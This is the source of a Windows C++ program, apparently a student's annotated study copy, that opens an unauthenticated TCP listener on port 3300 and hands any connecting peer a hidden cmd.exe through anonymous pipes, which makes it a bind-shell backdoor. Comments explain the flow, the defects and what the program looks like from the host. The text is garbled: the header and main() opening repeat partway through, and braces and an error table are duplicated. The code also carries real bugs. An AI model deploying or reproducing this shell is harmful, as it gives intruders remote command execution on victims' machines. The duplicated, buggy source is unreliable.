利用匿名管道实现远程CMD---我的解读
// vctelnetserver.cpp : Defines the entry point for the console application.
//这是从网上找的代码,相当于从解读代码的角度来分析这个“利用匿名管道实现的远程CMD”来学习我们这周的内容咯
//也算是半个晚上的成果,牛掰大神们不要笑话某渣
//by 司空徵
#include "stdio.h"
#include <Winsock2.h>
#include <Windows.h>
#include <Winbase.h>
#pragma comment(lib, "ws2_32.lib")
#pragma comment(lib, "kernel32.lib")
void main()
{
WSADATA zi;//该结构被用来储存调用AfxSocketInit全局函数返回的Windows Sockets初始化信息。
SOCKET telnetan;//TCP协议什么的telnet命令有关?!╮(╯_╰)╭
int pcport = 3300;
int ret;
if ((ret = WSAStartup(MAKEWORD(2,2),&zi)) != 0)//初始化差错报错系列
//windows初始化socket网络库申请2.2版本,从而使得高版本的Winsock可以使用
//winsock基础 如下
//http://wenku.baidu.com/link?url=Rvhc48n-iTPvXyndf2V-AyHd6pK39_H4ZQf8qlOd1Fkrb4NOmKC0Irf7uM6lXMDLM6iHsiP68-AVJiIrWHYNL4i5O3zDNNqdqKNfpo8hpbi
//这是从网上找的代码,相当于从解读代码的角度来分析这个“利用匿名管道实现的远程CMD”来学习我们这周的内容咯
//也算是半个晚上的成果,牛掰大神们不要笑话某渣
//by 司空徵
#include "stdio.h"
#include <Winsock2.h>
#include <Windows.h>
#include <Winbase.h>
#pragma comment(lib, "ws2_32.lib")
#pragma comment(lib, "kernel32.lib")
void main()
{
/* Entry point of the "remote CMD over anonymous pipes" listener. Control flow:
 *   1. WSAStartup, then socket/bind/listen on TCP port 3300 on every local
 *      interface (INADDR_ANY below) and block in accept();
 *   2. for each accepted connection create two anonymous pipes and start a
 *      hidden cmd.exe whose stdin/stdout/stderr are the pipe ends;
 *   3. loop forever copying cmd.exe output to the socket and socket input to
 *      cmd.exe's stdin.
 * Points a reader studying this code should be explicit about:
 *   - the peer is never authenticated and the traffic is plaintext: whoever can
 *     reach the port gets an interactive command prompt running with this
 *     process's token;
 *   - nothing created per connection (pipe handles, the child's process/thread
 *     handles, the accepted socket) is ever closed; see the notes at each site;
 *   - from the host's side this shows up as a listener on 3300 plus a cmd.exe
 *     child created with STARTF_USESTDHANDLES | SW_HIDE and pipes as its
 *     standard handles.
 * `void main()` is non-standard; the conforming form is `int main()`. */
WSADATA zi;// receives the Winsock implementation details filled in by WSAStartup()
SOCKET telnetan;// the listening socket; "telnet" is only the author's name for it, this is raw TCP, not the telnet protocol
int pcport = 3300;// listening port, hard-coded
int ret;
if ((ret = WSAStartup(MAKEWORD(2,2),&zi)) != 0)// request Winsock 2.2; WSAStartup returns the error code directly
// Winsock background (Chinese): http://wenku.baidu.com/link?url=Rvhc48n-iTPvXyndf2V-AyHd6pK39_H4ZQf8qlOd1Fkrb4NOmKC0Irf7uM6lXMDLM6iHsiP68-AVJiIrWHYNL4i5O3zDNNqdqKNfpo8hpbi
{
printf("WSAStartup failed with error %d\n", ret);
return;
}
if ((telnetan = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET)// IPv4 stream socket
{
printf("socket failed with error %d\n", WSAGetLastError());
WSACleanup();
return;
}
SOCKADDR_IN telnet_server;
// sockaddr_in is the IPv4-specific view of the generic sockaddr: it is filled in
// here and cast to SOCKADDR* for bind()/accept(), which only see the generic layout.
telnet_server.sin_family = AF_INET;// address family (AF_INET is IPv4; PF_INET is the protocol-family spelling of the same value)
telnet_server.sin_port = htons(pcport);// port must be in network byte order
telnet_server.sin_addr.s_addr = htonl(INADDR_ANY);// bind to *all* local interfaces, not just loopback:
// the listener is reachable from every network the host is attached to.
if (bind(telnetan, (SOCKADDR *)&telnet_server, sizeof(telnet_server))== SOCKET_ERROR)
// bind(): attach the local address/port filled in above to the socket handle
{
printf("bind failed with error %d\n", WSAGetLastError());
closesocket(telnetan);
WSACleanup();
return;
}
if (listen(telnetan, 5) == SOCKET_ERROR)// backlog of 5 pending connections; Winsock error codes are tabulated in the comment after main()
{
printf("listen failed with error %d\n", WSAGetLastError());
closesocket(telnetan);
WSACleanup();
return;
}
int telnetsize=sizeof(telnet_server);
SOCKET clientaccept;
while (true)// accept loop; never exits, and the listening socket is never closed
{
if((clientaccept = accept(telnetan, (SOCKADDR *) &telnet_server,&telnetsize)) != INVALID_SOCKET)
// accept() overwrites telnet_server with the *peer's* address (telnetsize is in/out).
// An accept() failure is silently ignored and the loop simply calls accept() again.
{
// Two anonymous pipes, one per direction:
//   pipe 1: parent writes hWriteFile -> child reads hReadPipe  (cmd.exe stdin)
//   pipe 2: child writes hWritePipe  -> parent reads hReadFile (cmd.exe stdout + stderr)
SECURITY_ATTRIBUTES pipeline1,pipeline2;
HANDLE hReadPipe,hWritePipe,hWriteFile,hReadFile;
pipeline1.nLength = sizeof(SECURITY_ATTRIBUTES);
pipeline1.lpSecurityDescriptor = NULL;// default security descriptor
pipeline1.bInheritHandle = true;// makes *both* ends inheritable, so the child receives both, not only the end it needs
if((ret = CreatePipe(&hReadPipe,&hWriteFile,&pipeline1,0)) = 0)
// DEFECT (left as in the original): `= 0` is an assignment, not the comparison `== 0`.
// In C++ `(ret = X) = 0` compiles, stores 0 in ret and makes the condition always false,
// so a CreatePipe failure is never detected here. The intended test is `== 0`.
{
printf("建立cmd管道失败! ::d%",GetLastError());// format string is `::d%`, not `%d`: the GetLastError() value is never printed
WSACleanup();// no return after cleanup: execution would continue with invalid handles if this branch were reachable
}
pipeline2.nLength = sizeof(SECURITY_ATTRIBUTES);
pipeline2.lpSecurityDescriptor = NULL;
pipeline2.bInheritHandle = true;
if((ret = CreatePipe(&hReadFile,&hWritePipe,&pipeline2,0)) = 0)// same `=` vs `==` defect as for pipe 1
{
printf("建立cmd管道失败! ::d%",GetLastError());// same malformed format string as above
WSACleanup();
}
// Child process setup: route cmd.exe's standard handles through the pipe ends.
STARTUPINFO cmdpos;
ZeroMemory(&cmdpos,sizeof(cmdpos));// zero the struct ...
GetStartupInfo(&cmdpos);// ... then immediately overwrite it with this process's own startup info (the ZeroMemory is redundant)
cmdpos.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;// honour wShowWindow and the hStd* fields set below
cmdpos.wShowWindow = SW_HIDE;// the child runs without a visible window
cmdpos.hStdInput = hReadPipe;// child reads its commands from pipe 1
cmdpos.hStdOutput = hWritePipe;// child output ...
cmdpos.hStdError = hWritePipe;// ... and child errors both go to pipe 2
PROCESS_INFORMATION processinformation;// receives the child's hProcess/hThread; neither is ever closed
// Build "<system directory>\cmd.exe" and start it.
char szAPP[256];
char recv_buff[1024];
char send_buff[1024];
DWORD nByteToWrite, nByteWritten,len;
// Related write-up on obtaining a remote shell (Chinese): http://hi.baidu.com/olhack/item/76aa411487891e0b8fbde40e
GetSystemDirectory(szAPP,MAX_PATH+1);
// NOTE: the size passed (MAX_PATH+1 = 261) is larger than szAPP itself (256 bytes), so the
// call is told the buffer is bigger than it is; the return value (0 on failure) is unchecked.
strcat(szAPP,"\\cmd.exe");// unbounded append into the same 256-byte buffer
ret=CreateProcess(NULL,szAPP,NULL,NULL,1,0,NULL,NULL,&cmdpos,&processinformation);
// CreateProcess with bInheritHandles = 1: the child inherits *every* inheritable handle of
// this process, not only the pipe ends (the socket handles may be among them -- verify).
// The result is stored in ret but never checked; if the child failed to start, the loop
// below blocks forever in ReadFile on a pipe nothing writes to.
while(true)// relay loop; there is no exit condition, it ends only when the whole process dies
{
ReadFile(hReadFile,send_buff,1024,&len,NULL);// blocks until cmd.exe writes; on failure `len` is not meaningful. Because the parent
// keeps its own copy of hWritePipe open, this read does not report end-of-pipe when cmd.exe exits.
send(clientaccept,send_buff,len,0);// raw bytes to the peer; return value unchecked
printf("%s",send_buff);// echo to the local console; ReadFile does not NUL-terminate send_buff, so %s can read past the data
Sleep(1);
nByteToWrite = recv(clientaccept,recv_buff,1024,0);// blocks until the peer sends; returns 0 on orderly close, SOCKET_ERROR (-1) on error
// Neither case is handled: -1 stored in a DWORD is 0xFFFFFFFF and is handed to WriteFile as a
// byte count far beyond recv_buff's 1024 bytes; a peer that disconnected (0) is not noticed,
// the loop just goes back to blocking in ReadFile, and the child, pipes and socket leak.
WriteFile(hWriteFile,recv_buff,nByteToWrite,&nByteWritten,NULL);// forward the peer's bytes to cmd.exe's stdin; result unchecked
Sleep(1);
}
}
}
}
/*************************************socket错误一览***********************************************
Socket error 0 - Directly send error
Socket error 10004 - Interrupted function call
Socket error 10013 - Permission denied(权限被拒绝)
Socket error 10014 - Bad address
Socket error 10022 - Invalid argument
Socket error 10024 - Too many open files
Socket error 10035 - Resource temporarily unavailable
Socket error 10036 - Operation now in progress
Socket error 10037 - Operation already in progress
Socket error 10038 - Socket operation on non-socket
Socket error 10039 - Destination address required
Socket error 10040 - Message too long
Socket error 10041 - Protocol wrong type for socket
Socket error 10042 - Bad protocol option
Socket error 10043 - Protocol not supported
Socket error 10044 - Socket type not supported
Socket error 10045 - Operation not supported
Socket error 10046 - Protocol family not supported
Socket error 10047 - Address family not supported by protocol family
Socket error 10048 - Address already in use
Socket error 10049 - Cannot assign requested address
Socket error 10050 - Network is down
Socket error 10051 - Network is unreachable
Socket error 10052 - Network dropped connection on reset
Socket error 10053 - Software caused connection abort
Socket error 10054 - Connection reset by peer
Socket error 10055 - No buffer space available
Socket error 10056 - Socket is already connected
Socket error 10057 - Socket is not connected
Socket error 10058 - Cannot send after socket shutdown
Socket error 10060 - Connection timed out
Socket error 10061 - Connection refused
Socket error 10064 - Host is down
Socket error 10065 - No route to host
Socket error 10067 - Too many processes
Socket error 10091 - Network subsystem is unavailable
Socket error 10092 - WINSOCK.DLL version out of range
Socket error 10093 - Successful WSAStartup not yet performed
Socket error 10094 - Graceful shutdown in progress
Socket error 11001 - Host not found
Socket error 11002 - Non-authoritative host not found
Socket error 11003 - This is a non-recoverable error
Socket error 11004 - Valid name, no data record of requested type
WSAEADDRINUSE (10048) Address already in use
WSAECONNABORTED (10053) Software caused connection abort
WSAECONNREFUSED (10061) Connection refused
WSAECONNRESET (10054) Connection reset by peer
WSAEDESTADDRREQ (10039) Destination address required
WSAEHOSTUNREACH (10065) No route to host
WSAEMFILE (10024) Too many open files
WSAENETDOWN (10050) Network is down
WSAENETRESET (10052) Network dropped connection
WSAENOBUFS (10055) No buffer space available
WSAENETUNREACH (10051) Network is unreachable
WSAETIMEDOUT (10060) Connection timed out
WSAHOST_NOT_FOUND (11001) Host not found
WSASYSNOTREADY (10091) Network sub-system is unavailable
WSANOTINITIALISED (10093) WSAStartup() not performed
WSANO_DATA (11004) Valid name, no data of that type
WSANO_RECOVERY (11003) Non-recoverable query error
WSATRY_AGAIN (11002) Non-authoritative host found
WSAVERNOTSUPPORTED (10092) Wrong WinSock DLL version
************************************socket错误一览***********************************************/
}
}
}
/*************************************socket错误一览***********************************************
Socket error 0 - Directly send error
Socket error 10004 - Interrupted function call
Socket error 10013 - Permission denied(权限被拒绝)
Socket error 10014 - Bad address
Socket error 10022 - Invalid argument
Socket error 10024 - Too many open files
Socket error 10035 - Resource temporarily unavailable
Socket error 10036 - Operation now in progress
Socket error 10037 - Operation already in progress
Socket error 10038 - Socket operation on non-socket
Socket error 10039 - Destination address required
Socket error 10040 - Message too long
Socket error 10041 - Protocol wrong type for socket
Socket error 10042 - Bad protocol option
Socket error 10043 - Protocol not supported
Socket error 10044 - Socket type not supported
Socket error 10045 - Operation not supported
Socket error 10046 - Protocol family not supported
Socket error 10047 - Address family not supported by protocol family
Socket error 10048 - Address already in use
Socket error 10049 - Cannot assign requested address
Socket error 10050 - Network is down
Socket error 10051 - Network is unreachable
Socket error 10052 - Network dropped connection on reset
Socket error 10053 - Software caused connection abort
Socket error 10054 - Connection reset by peer
Socket error 10055 - No buffer space available
Socket error 10056 - Socket is already connected
Socket error 10057 - Socket is not connected
Socket error 10058 - Cannot send after socket shutdown
Socket error 10060 - Connection timed out
Socket error 10061 - Connection refused
Socket error 10064 - Host is down
Socket error 10065 - No route to host
Socket error 10067 - Too many processes
Socket error 10091 - Network subsystem is unavailable
Socket error 10092 - WINSOCK.DLL version out of range
Socket error 10093 - Successful WSAStartup not yet performed
Socket error 10094 - Graceful shutdown in progress
Socket error 11001 - Host not found
Socket error 11002 - Non-authoritative host not found
Socket error 11003 - This is a non-recoverable error
Socket error 11004 - Valid name, no data record of requested type
WSAEADDRINUSE (10048) Address already in use
WSAECONNABORTED (10053) Software caused connection abort
WSAECONNREFUSED (10061) Connection refused
WSAECONNRESET (10054) Connection reset by peer
WSAEDESTADDRREQ (10039) Destination address required
WSAEHOSTUNREACH (10065) No route to host
WSAEMFILE (10024) Too many open files
WSAENETDOWN (10050) Network is down
WSAENETRESET (10052) Network dropped connection
WSAENOBUFS (10055) No buffer space available
WSAENETUNREACH (10051) Network is unreachable
WSAETIMEDOUT (10060) Connection timed out
WSAHOST_NOT_FOUND (11001) Host not found
WSASYSNOTREADY (10091) Network sub-system is unavailable
WSANOTINITIALISED (10093) WSAStartup() not performed
WSANO_DATA (11004) Valid name, no data of that type
WSANO_RECOVERY (11003) Non-recoverable query error
WSATRY_AGAIN (11002) Non-authoritative host found
WSAVERNOTSUPPORTED (10092) Wrong WinSock DLL version
************************************socket错误一览***********************************************/